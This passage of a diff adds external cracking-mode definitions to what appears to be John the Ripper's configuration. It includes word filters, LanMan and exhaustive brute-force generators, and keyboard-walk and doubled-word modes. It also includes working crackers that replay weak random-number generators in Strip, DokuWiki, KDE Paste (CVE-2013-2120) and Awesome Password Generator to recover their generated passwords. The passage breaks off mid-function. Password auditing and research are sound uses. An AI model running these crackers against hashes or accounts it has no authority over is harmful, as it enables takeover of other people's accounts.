+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (((c < 'a' || c > 'z') && c != ' ') || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Lower]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'a' || c > 'z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Upper]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < 'A' || c > 'Z' || i > 13) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_Digits]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if (c < '0' || c > '9' || i > 20) {
+		word = 0; return;
+	}
+}
+
+[List.External:Filter_No_Cap_or_Symbols]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
+		return;
+	}
+	word = 0; return;
+}
+
+
+# Reject words that are illegal UTF-8
+# We obviously let pure ASCII through too
+[List.External:Filter_UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				word = 0; return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				word = 0; return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					word = 0; return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					word = 0; return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					word = 0; return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					word = 0; return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					word = 0; return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						word = 0; return;
+					}
+				}
+			}
+		}
+	}
+}
+
+# Reject words that are LEGAL UTF-8 (also rejects pure ASCII)
+[List.External:Filter_non-UTF8]
+void filter()
+{
+	int s, a, p;
+
+	p = 0;
+	while (s = word[p++] & 0xff) {
+		if (s > 0x7f) {
+			if (s < 0xc2 || s > 0xf7) { // illegal single-byte
+				return;
+			}
+			// two-byte c2..df
+			a = word[p++] & 0xff;
+			if (a < 0x80 || a > 0xbf) {
+				return;
+			}
+			if (s > 0xdf) { // three-byte e0..ef
+				if (s == 0xe0 && a < 0xa0) {
+					return;
+				}
+				if (s == 0xed && a > 0x9f) {
+					return;
+				}
+				if (s == 0xf0 && a < 0x90) {
+					return;
+				}
+				if (s == 0xf4 && a > 0x8f) {
+					return;
+				}
+				a = word[p++] & 0xff;
+				if (a < 0x80 || a > 0xbf) {
+					return;
+				}
+				if (s > 0xef) { // four-byte f0..f7
+					a = word[p++] & 0xff;
+					if (a < 0x80 || a > 0xbf) {
+						return;
+					}
+				}
+			}
+		}
+	}
+	word = 0;
+}
+
+# A simple cracker for LM hashes
+[List.External:LanMan]
+int length;				// Current length
+int maxlength;
+
+void init()
+{
+	if (req_minlen)
+		length = req_minlen;
+	else
+		length = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	word[0] = 'A' - 1;		// Start with "A"
+	word[length] = 0;
+}
+
+void generate()
+{
+	int i;
+
+	i = length - 1;			// Start from the last character
+	while (++word[i] > 'Z')		// Try to increase it
+	if (i)				// Overflow here, any more positions?
+		word[i--] = 'A';	// Yes, move to the left, and repeat
+	else				// No
+
+	if (length < maxlength) {
+		word[i = ++length] = 0;	// Switch to the next length
+		while (i--)
+			word[i] = 'A';
+		return;
+	} else {
+		word = 0; return;	// We're done
+	}
+}
+
+void restore()
+{
+	length = 0;			// Calculate the length
+	while (word[length]) length++;
+}
+
+# Simple and well-commented, yet useful external mode example
+# NOTE, this has now been 'split' up into a base extern, 'base', and then
+# multiple External:double functions.  It still has same code as original
+# double, but now can be easily expanded.
+[List.External_base:Double]
+/*
+ * This cracking mode tries all the possible duplicated lowercase alphabetic
+ * "words" of up to 8 characters long.  Since word halves are the same, it
+ * only has to try about 500,000 words.
+ */
+
+/* Global variables: current length and word */
+/* make this 'long' enough for other externs that include this one */
+/* (up to 125 bytes long) */
+
+int length, current[126], max;
+
+/* this new 'type' variable, is used to tell double what character set to
+ * use. It can use the original (alpha).  If type is 0 (i.e. unset), then
+ * a-z (alpha) character set is used.  If type is '0' (a zero ascii byte)
+ * then alnum charset is used, a-z0-9.  If type is a space char, then all
+ * charset is used  [space - tilde]  or [ -~].  This required setting the
+ * type var in the init() of alnum or all doubles (it can be left unset
+ * in the alpha versions).  It also requires some if logic in generate.
+ * other than that, it works the same, with almost no performance hit */
+int type;
+
+/* Generates a new word */
+void generate()
+{
+	int i;
+
+/* Export last generated word, duplicating it at the same time; here "word"
+ * is a pre-defined external variable. */
+	word[(i = length) << 1] = 0;
+	while (i--) word[length + i] = word[i] = current[i];
+
+/* Generate a new word */
+	i = length - 1;			// Start from the last character
+	if (type == 0) {
+		/* alpha */
+		while (++current[i] > 'z')	// Try to increase it
+		if (i)				// Overflow here, any more positions?
+			current[i--] = 'a';	// Yes, move to the left, and repeat
+		else {				// No
+			current = 0;		// Request a length switch
+			break;			// Break out of the loop
+		}
+	} else if (type == '0') {
+		/* alnum */
+		if (current[i] == 'z') current[i] = '0'-1;
+		while (++current[i] == '9')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = 'a';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+			if (current[i] == 'z') current[i] = '0'-1;
+		}
+	} else if (type == ' ') {
+		/* all */
+		while (++current[i] > '~')	{ // Try to increase it
+			if (i)				// Overflow here, any more positions?
+				current[i--] = ' ';	// Yes, move to the left, and repeat
+			else {				// No
+				current = 0;		// Request a length switch
+				break;			// Break out of the loop
+			}
+		}
+	}
+	/* else ????? wtf?? */
+
+/* Switch to the next length, unless we were generating 8 character long
+ * words already. */
+	if (!current && length < max) {
+		i = ++length;
+		if (type == 0 || type == '0')
+			while (i--) current[i] = 'a';
+		else if (type == ' ')
+			while (i--) current[i] = ' ';
+	}
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+/* Import the word back */
+	i = 0;
+	while (current[i] = word[i]) i++;
+
+/* ...and calculate the half-word length */
+	length = i >> 1;
+}
+
+[List.External:Double]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+}
+
+[List.External:Double_alnum]
+.include [List.External_base:Double]
+
+/* Called at startup to initialize the global variables */
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = 'a';	// Set our half-word to "aa"
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = '0';
+}
+
+[List.External:Double_all]
+.include [List.External_base:Double]
+void init()
+{
+	int i;
+
+	if (req_minlen)
+		i = length = (req_minlen + 1) / 2;
+	else
+		i = length = 2;		// Start with 4 character long words
+	while (i--) current[i] = ' ';	// Set our half-word to "  "
+	if (req_maxlen)
+		max = (req_maxlen + 1) / 2;
+	else if (length > 4)
+		max = length;
+	else
+		max = 4;
+
+	type = ' ';
+}
+
+
+# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
+# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
+# crack passwords you may have generated with Strip; other uses of Strip
+# are unaffected.
+[List.External:Strip]
+int minlength, maxlength, mintype, maxtype;
+int crack_seed, length, type;
+int count, charset[128];
+
+void init()
+{
+	int c;
+
+/* Password lengths to try; Strip can generate passwords of 4 to 16
+ * characters, but traditional crypt(3) hashes are limited to 8. */
+	minlength = req_minlen;
+	if (minlength < 4)
+		minlength = 4;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else					// the format's limit
+		maxlength = cipher_limit;
+	if (maxlength >16) maxlength = 16;
+
+/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
+	mintype = 0;	// 0
+	maxtype = 2;	// 2
+
+	crack_seed = 0x10000;
+	length = minlength - 1;
+	type = mintype;
+
+	count = 0;
+	c = '0'; while (c <= '9') charset[count++] = c++;
+}
+
+void generate()
+{
+	int seed, random;
+	int i, c;
+
+	if (crack_seed > 0xffff) {
+		crack_seed = 0;
+
+		if (++length > maxlength) {
+			length = minlength;
+
+			if (++type > maxtype) {
+				word[0] = 0;
+				return;
+			}
+		}
+
+		count = 10;
+		if (type >= 1) {
+			c = 'a'; while (c <= 'f') charset[count++] = c++;
+			c = 'h'; while (c <= 'z') charset[count++] = c++;
+			c = 'A'; while (c <= 'Z') charset[count++] = c++;
+		}
+		if (type == 2) {
+			charset[count++] = '!';
+			c = '#'; while (c <= '&') charset[count++] = c++;
+			c = '('; while (c <= '/') charset[count++] = c++;
+			c = '<'; while (c <= '>') charset[count++] = c++;
+			charset[count++] = '?'; charset[count++] = '@';
+			charset[count++] = '['; charset[count++] = ']';
+			charset[count++] = '^'; charset[count++] = '_';
+			c = '{'; while (c <= '~') charset[count++] = c++;
+		}
+	}
+
+	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
+
+	i = 0;
+	while (i < length) {
+		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
+		word[i++] = charset[random % count];
+	}
+
+	word[i] = 0;
+}
+
+# A variation of KnownForce configured to try all the 385641000 possible
+# auto-generated passwords of DokuWiki versions up to at least 2013-05-10.
+[List.External:DokuWiki]
+int last;		// Last character position, zero-based
+int lastofs;		// Last character position offset into charset[]
+int lastid;		// Current character index in the last position
+int id[0x7f];		// Current character indices for other positions
+int charset[0x7f00];	// Character sets, 0x100 elements for each position
+
+void init()
+{
+	int A[26], C[26], V[26];
+	int length;
+	int pos, ofs, i, c;
+
+	i = 0; while (i < 26) { A[i] = C[i] = 1; V[i++] = 0; }
+	i = 'a' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'e' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'i' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'o' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'u' - 'a'; C[i] = 0; V[i] = 1;
+	i = 'q' - 'a'; A[i] = C[i] = 0;
+	i = 'x' - 'a'; A[i] = C[i] = 0;
+	i = 'y' - 'a'; A[i] = C[i] = 0;
+
+	length = 8;
+
+/* This defines the character sets for different character positions */
+	pos = 0;
+	while (pos < 6) {
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (C[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (V[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+		ofs = pos++ << 8;
+		i = 0;
+		c = 'a' - 1;
+		while (++c <= 'z')
+			if (A[c - 'a'])
+				charset[ofs + i++] = c;
+		charset[ofs + i] = 0;
+	}
+	c = '1';
+	while (pos < length) {
+		ofs = pos++ << 8;
+		i = 0;
+		while (c <= '9')
+			charset[ofs + i++] = c++;
+		charset[ofs + i] = 0;
+		c = '0';
+	}
+
+	last = length - 1;
+	pos = -1;
+	while (++pos <= last)
+		word[pos] = charset[id[pos] = pos << 8];
+	lastid = (lastofs = last << 8) - 1;
+	word[pos] = 0;
+}
+
+void generate()
+{
+	int pos;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	word[pos = last] = charset[lastid = lastofs];
+	while (pos--) {			// Have a preceding position?
+		if (word[pos] = charset[++id[pos]]) return;
+		word[pos] = charset[id[pos] = pos << 8];
+	}
+
+	word = 0;			// We're done
+}
+
+void restore()
+{
+	int i, c;
+
+/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = lastofs = last << 8;
+		while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = lastofs; // Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
+
+/*
+ * This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet
+ * uses to generate passwords.
+ *
+ * This software is Copyright (c) Michael Samuel <mik@miknet.net>,
+ * and it is hereby released to the general public under the following terms:
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted.
+ */
+[List.External:KDEPaste]
+int charset[95];
+int charset_length, password_length, endTime, startTime, msec;
+
+void init()
+{
+	password_length = 8;	/* Change this to match config */
+	endTime = session_start_time;
+	startTime = 1343743200;	/* Aug 1 2012  - Change this as necessary */
+
+	msec = 1;		/* msec is never 0 - it would crash the applet */
+
+	charset_length = 0;
+	int c;
+
+	/* Comment out classes that you don't need, but keep the order the same */
+	/* Lowers */
+	c = 'a'; while (c <= 'z') charset[charset_length++] = c++;
+
+	/* Uppers */
+	c = 'A'; while (c <= 'Z') charset[charset_length++] = c++;
+
+	/* Numbers */
+	c = '0'; while (c <= '9') charset[charset_length++] = c++;
+	charset[charset_length++] = '0';	/* Yep, it's there twice */
+
+	/* Symbols */
+	c = '!'; while (c <= '/') charset[charset_length++] = c++;
+	c = ':'; while (c <= '@') charset[charset_length++] = c++;
+	c = '['; while (c <= '`') charset[charset_length++] = c++;
+	c = '{'; while (c <= '~') charset[charset_length++] = c++;
+}
+
+void generate()
+{
+	int i, rand_seed, rand_result;
+
+	/* Terminate once we've generated for all *
+	 * of the time range (Plus a bit more...) */
+	if (endTime + 1000 < startTime) {
+		word = 0;
+		return;
+	}
+
+	/* Skip msecs that would generate dupes */
+	while (endTime % msec != 0) {
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+
+	rand_seed = endTime / msec;
+
+	i = 0;
+	while (i < password_length) {
+		/* this works like rand_r() from eglibc */
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result = (rand_seed >> 16) & 2047;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		rand_seed = rand_seed * 1103515245 + 12345;
+		rand_result <<= 10;
+		rand_result ^= (rand_seed >> 16) & 1023;
+
+		word[i++] = charset[rand_result % charset_length];
+	}
+	word[i] = 0;
+
+	if (++msec > 999) {
+		endTime--;
+		msec = 1;
+	}
+}
+
+void restore()
+{
+	int i, rand_seed, rand_result;
+
+	i = 0;
+
+	/* Very crude restore, just dry-run until we hit last word */
+	while (i != password_length) {
+
+		while (endTime % msec != 0) {
+			if (++msec > 999) {
+				endTime--;
+				msec = 1;
+			}
+		}
+
+		rand_seed = endTime / msec;
+
+		i = 0;
+		while (i < password_length) {
+			/* this works like rand_r() from eglibc */
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result = (rand_seed >> 16) & 2047;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			rand_seed = rand_seed * 1103515245 + 12345;
+			rand_result <<= 10;
+			rand_result ^= (rand_seed >> 16) & 1023;
+
+			if (charset[rand_result % charset_length] != word[i++])
+				break;
+		}
+
+		if (++msec > 999) {
+			endTime--;
+			msec = 1;
+		}
+	}
+}
+
+/* Awesome Password Generator RNG replay
+ * Written by Michael Samuel <mik@miknet.net>
+ * Public Domain.
+ *
+ * This takes advantage of a subtle bug, where a crypto RNG is used to
+ * seed the C# System.Random() class, which takes a 32-bit input, but
+ * converts negative numbers into non-negative numbers, resulting in
+ * only 31 bits of security.
+ *
+ * This only implements "easy to type" being *unticked*, and numbers,
+ * lowers, uppers and symbols being ticked, in random password mode.
+ * Changing the password length is easy, anything else is left as an
+ * exercise to the reader.
+ *
+ * Running Awesome Password Generator (1.3.2 or lower) in Mono is still
+ * vulnerable, but uses a different RNG, so this mode isn't compatible.
+ */
+
+/* Awesome Password Generator 1.3.2 does a two-pass run, selecting which
+ * charset each position will have, then picking the character.  This
+ * leads to heavy bias, and is fixed in 1.4.0 (along with many other
+ * fixes).  If you have been using Awesome Password Generator, you should
+ * upgrade immediately and change your passwords.
+ */
+[List.External:AwesomePasswordGenerator]
+int numbers[10];
+int lowers[26];
+int uppers[26];
+int symbols[32];
+
+/* Since we don't have a double datatype, I simply pre-calculated the
+ * transition numbers calculating the scale formula:
+ * (double)randNum * 4.656612873077393e-10 * {4/10/26/32}
+ */
+int boundaries_charclass[4];
+int boundaries_numbers[10];
+int boundaries_letters[26];
+int boundaries_symbols[32];
+
+/* This is the bug we're exploiting - the seed for the RNG is 32 bits
+ * from the crypto rng.  The non-crypto RNG converts negative numbers
+ * into non-negative numbers, so there's only 2^31 possible seeds.
+ */
+int seed;
+
+int password_length;
+
+void init()
+{
+	password_length = 16; /* Change this to match config */
+
+	int c, i;
+
+	c = '0'; i = 0; while (c <= '9') numbers[i++] = c++;
+	c = 'a'; i = 0; while (c <= 'z') lowers[i++] = c++;
+	c = 'A'; i = 0; while (c <= 'Z') uppers[i++] = c++;
+
+	/* Symbols */
+	i = 0;
+	symbols[i++] = '!'; symbols[i++] = '@'; symbols[i++] = '#'; symbols[i++] = '$';
+	symbols[i++] = '%'; symbols[i++] = '^'; symbols[i++] = '&'; symbols[i++] = '*';
+	symbols[i++] = '('; symbols[i++] = ')'; symbols[i++] = '~'; symbols[i++] = '-';
+	symbols[i++] = '_'; symbols[i++] = '='; symbols[i++] = '+'; symbols[i++] = '\\';
+	symbols[i++] = '|'; symbols[i++] = '/'; symbols[i++] = '['; symbols[i++] = ']';
+	symbols[i++] = '{'; symbols[i++] = '}'; symbols[i++] = ';'; symbols[i++] = ':';
+	symbols[i++] = '`'; symbols[i++] = '\''; symbols[i++] = '"'; symbols[i++] = ',';
+	symbols[i++] = '.'; symbols[i++] = '<'; symbols[i++] = '>'; symbols[i++] = '?';
+
+	i = 0;
+	boundaries_charclass[i++] = 536870912; boundaries_charclass[i++] = 1073741824;
+	boundaries_charclass[i++] = 1610612736; boundaries_charclass[i++] = 2147483647;
+
+	i = 0;
+	boundaries_numbers[i++] = 214748365; boundaries_numbers[i++] = 429496730;
+	boundaries_numbers[i++] = 644245095; boundaries_numbers[i++] = 858993460;
+	boundaries_numbers[i++] = 1073741824; boundaries_numbers[i++] = 1288490189;
+	boundaries_numbers[i++] = 1503238554; boundaries_numbers[i++] = 1717986919;
+	boundaries_numbers[i++] = 1932735284; boundaries_numbers[i++] = 2147483647;
+
+	i = 0;
+	boundaries_letters[i++] = 82595525; boundaries_letters[i++] = 165191050;
+	boundaries_letters[i++] = 247786575; boundaries_letters[i++] = 330382100;
+	boundaries_letters[i++] = 412977625; boundaries_letters[i++] = 495573150;
+	boundaries_letters[i++] = 578168675; boundaries_letters[i++] = 660764200;
+	boundaries_letters[i++] = 743359725; boundaries_letters[i++] = 825955250;
+	boundaries_letters[i++] = 908550775; boundaries_letters[i++] = 991146300;
+	boundaries_letters[i++] = 1073741824; boundaries_letters[i++] = 1156337349;
+	boundaries_letters[i++] = 1238932874; boundaries_letters[i++] = 1321528399;
+	boundaries_letters[i++] = 1404123924; boundaries_letters[i++] = 1486719449;
+	boundaries_letters[i++] = 1569314974; boundaries_letters[i++] = 1651910499;
+	boundaries_letters[i++] = 1734506024; boundaries_letters[i++] = 1817101549;
+	boundaries_letters[i++] = 1899697074; boundaries_letters[i++] = 1982292599;
+	boundaries_letters[i++] = 2064888124; boundaries_letters[i++] = 2147483647;
+
+	i = 0;
+	boundaries_symbols[i++] = 67108864; boundaries_symbols[i++] = 134217728;
+	boundaries_symbols[i++] = 201326592; boundaries_symbols[i++] = 268435456;
+	boundaries_symbols[i++] = 335544320; boundaries_symbols[i++] = 402653184;
+	boundaries_symbols[i++] = 469762048; boundaries_symbols[i++] = 536870912;
+	boundaries_symbols[i++] = 603979776; boundaries_symbols[i++] = 671088640;
+	boundaries_symbols[i++] = 738197504; boundaries_symbols[i++] = 805306368;
+	boundaries_symbols[i++] = 872415232; boundaries_symbols[i++] = 939524096;
+	boundaries_symbols[i++] = 1006632960; boundaries_symbols[i++] = 1073741824;
+	boundaries_symbols[i++] = 1140850688; boundaries_symbols[i++] = 1207959552;
+	boundaries_symbols[i++] = 1275068416; boundaries_symbols[i++] = 1342177280;
+	boundaries_symbols[i++] = 1409286144; boundaries_symbols[i++] = 1476395008;
+	boundaries_symbols[i++] = 1543503872; boundaries_symbols[i++] = 1610612736;
+	boundaries_symbols[i++] = 1677721600; boundaries_symbols[i++] = 1744830464;
+	boundaries_symbols[i++] = 1811939328; boundaries_symbols[i++] = 1879048192;
+	boundaries_symbols[i++] = 1946157056; boundaries_symbols[i++] = 2013265920;
+	boundaries_symbols[i++] = 2080374784; boundaries_symbols[i++] = 2147483647;
+
+	seed = 0;
+}
+
+void generate()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+
+	/* BEGIN System.Random(seed) */
+	if(seed < 0) {
+		/* Only bother with non-negative integers */
+		word = 0;
+		return;
+	}
+
+	s = 161803398 - seed++;
+	seedarray[55] = s;
+	i = val = 1;
+
+	while(i < 55) {
+		bucket = 21 * i % 55;
+		seedarray[bucket] = val;
+		val = s - val;
+		if(val < 0) val += 2147483647;
+		s = seedarray[bucket];
+		i++;
+	}
+
+	i = 1;
+	while(i < 5) {
+		j = 1;
+		while(j < 56) {
+			seedarray[j] -= seedarray[1 + (j + 30) % 55];
+			if(seedarray[j] < 0) seedarray[j] += 2147483647;
+			j++;
+		}
+		i++;
+	}
+	next = 0;
+	nextp = 21;
+	/* END System.Random(seed) */
+
+	used_charsets = 0;
+	while(used_charsets != 15) {
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+
+			j = 0;
+			while(boundaries_charclass[j] < randnum) j++;
+
+			word[i] = j; /* Temporarily store in word[] */
+			used_charsets |= (1 << j);
+			i++;
+		}
+	}
+
+	i = 0;
+	while(i < password_length) {
+		/* BEGIN Random.Sample() */
+		if (++next >= 56) next = 1;
+		if (++nextp >= 56) nextp = 1;
+		randnum = seedarray[next] - seedarray[nextp];
+		if (randnum == 2147483647) randnum--;
+		if (randnum < 0) randnum += 2147483647;
+		seedarray[next] = randnum;
+		/* END Random.Sample() */
+		j = 0;
+
+		if(word[i] == 0) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = lowers[j];
+		} else if (word[i] == 1) {
+			while(boundaries_letters[j] < randnum) j++;
+			word[i++] = uppers[j];
+		} else if (word[i] == 2) {
+			while(boundaries_numbers[j] < randnum) j++;
+			word[i++] = numbers[j];
+		} else { /* if (word[i] == 3) */
+			while(boundaries_symbols[j] < randnum) j++;
+			word[i++] = symbols[j];
+		}
+	}
+	word[i] = 0;
+}
+
+
+void restore()
+{
+	int i, j, s, next, nextp, val, bucket, randnum, used_charsets;
+	int seedarray[56];
+	int candidate[32]; /* This needs to be at-least as big as password-length */
+
+	seed = 0;
+
+	while(seed > 0) {
+		/* BEGIN System.Random(seed) */
+		s = 161803398 - seed++;
+		seedarray[55] = s;
+		i = val = 1;
+
+		while(i < 55) {
+			bucket = 21 * i % 55;
+			seedarray[bucket] = val;
+			val = s - val;
+			if(val < 0) val += 2147483647;
+			s = seedarray[bucket];
+			i++;
+		}
+
+		i = 1;
+		while(i < 5) {
+			j = 1;
+			while(j < 56) {
+				seedarray[j] -= seedarray[1 + (j + 30) % 55];
+				if(seedarray[j] < 0) seedarray[j] += 2147483647;
+				j++;
+			}
+			i++;
+		}
+		next = 0;
+		nextp = 21;
+		/* END System.Random(seed) */
+
+		used_charsets = 0;
+		while(used_charsets != 15) {
+			i = 0;
+			while(i < password_length) {
+				/* BEGIN Random.Sample() */
+				if (++next >= 56) next = 1;
+				if (++nextp >= 56) nextp = 1;
+				randnum = seedarray[next] - seedarray[nextp];
+				if (randnum == 2147483647) randnum--;
+				if (randnum < 0) randnum += 2147483647;
+				seedarray[next] = randnum;
+				/* END Random.Sample() */
+
+				j = 0;
+				while(boundaries_charclass[j] < randnum) j++;
+
+				candidate[i] = j;
+				used_charsets |= (1 << j);
+				i++;
+			}
+		}
+
+		i = 0;
+		while(i < password_length) {
+			/* BEGIN Random.Sample() */
+			if (++next >= 56) next = 1;
+			if (++nextp >= 56) nextp = 1;
+			randnum = seedarray[next] - seedarray[nextp];
+			if (randnum == 2147483647) randnum--;
+			if (randnum < 0) randnum += 2147483647;
+			seedarray[next] = randnum;
+			/* END Random.Sample() */
+			j = 0;
+
+			if(candidate[i] == 0) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(lowers[j] != word[i++]) break;
+			} else if (candidate[i] == 1) {
+				while(boundaries_letters[j] < randnum) j++;
+				if(uppers[j] != word[i++]) break;
+			} else if (candidate[i] == 2) {
+				while(boundaries_numbers[j] < randnum) j++;
+				if(numbers[j] != word[i++]) break;
+			} else { /* if (word[i] == 3) */
+				while(boundaries_symbols[j] < randnum) j++;
+				if(symbols[j] != word[i++]) break;
+			}
+		}
+		if(i == password_length) return;
+	}
+}
+
+# Try sequences of adjacent keys on a keyboard as candidate passwords
+[List.External:Keyboard]
+int maxlength, length;	// Maximum password length to try, current length
+int fuzz;		// The desired "fuzz factor", either 0 or 1
+int id[15];		// Current character indices for each position
+int m[0x800];		// The keys matrix
+int mc[0x100];		// Counts of adjacent keys
+int f[0x40], fc;	// Characters for the first position, their count
+
+void init()
+{
+	int minlength;
+	int i, j, c, p;
+	int k[0x40];
+
+	// Initial password length to try
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;	// the format's limit
+	fuzz = 1;			// "Fuzz factor", set to 0 for much quicker runs
+
+/*
+ * This defines the keyboard layout, by default for a QWERTY keyboard.
+ */
+	i = 0; while (i < 0x40) k[i++] = 0;
+	k[0] = '`';
+	i = 0; while (++i <= 9) k[i] = '0' + i;
+	k[10] = '0'; k[11] = '-'; k[12] = '=';
+	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
+	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
+	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
+	k[0x1d] = '\\';
+	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
+	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
+	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
+	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
+	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
+	k[0x39] = '.'; k[0x3a] = '/';
+
+	i = 0; while (i < 0x100) mc[i++] = 0;
+	fc = 0;
+
+	/* rows */
+	c = 0;
+	i = 0;
+	while (i < 0x40) {
+		p = c;
+		c = k[i++] & 0xff;
+		if (!c) continue;
+		f[fc++] = c;
+		if (!p) continue;
+		m[(c << 3) + mc[c]++] = p;
+		m[(p << 3) + mc[p]++] = c;
+	}
+	f[fc] = 0;
+
+	/* columns */
+	i = 0;
+	while (i < 0x30) {
+		p = k[i++] & 0xff;
+		if (!p) continue;
+		j = 1 - fuzz;
+		while (j <= 1 + fuzz) {
+			c = k[i + 0x10 - j++] & 0xff;
+			if (!c) continue;
+			m[(c << 3) + mc[c]++] = p;
+			m[(p << 3) + mc[p]++] = c;
+		}
+	}
+
+	length = 0;
+	while (length < minlength)
+		id[length++] = 0;
+}
+
+void generate()
+{
+	int i, p, maxcount;
+
+	word[i = 0] = p = f[id[0]];
+	while (++i < length)
+		word[i] = p = m[(p << 3) + id[i]];
+	word[i--] = 0;
+
+	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	while (++id[i] >= maxcount) {
+		if (!i) {
+			if (length < maxlength) {
+				id[0] = 0;
+				id[length++] = 0;
+			}
+			return;
+		}
+		id[i--] = 0;
+		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
+	}
+}
+
+void restore()
+{
+	int i;
+
+	/* Calculate the length */
+	length = 0;
+	while (word[length])
+		id[length++] = 0;
+
+	/* Infer the first character index */
+	i = -1;
+	while (++i < fc) {
+		if (f[i] == word[0]) {
+			id[0] = i;
+			break;
+		}
+	}
+
+	/* This sample can be enhanced to infer the rest of the indices here */
+}
+
+# Simplest (fastest?) possible dumb exhaustive search, demonstrating a
+# mode that does not need any special restore() handling.
+# Defaults to printable ASCII.
+[List.External:DumbDumb]
+int maxlength;		// Maximum password length to try
+int startchar, endchar;	// Range of characters (inclusive)
+
+void init()
+{
+	int i;
+
+	startchar = ' ';	// Start with space
+	endchar = '~';		// End with tilde
+
+	// Create first word, honoring --min-len
+	if (!(i = req_minlen))
+		i++;
+	word[i] = 0;
+	while (i--)
+		word[i] = startchar;
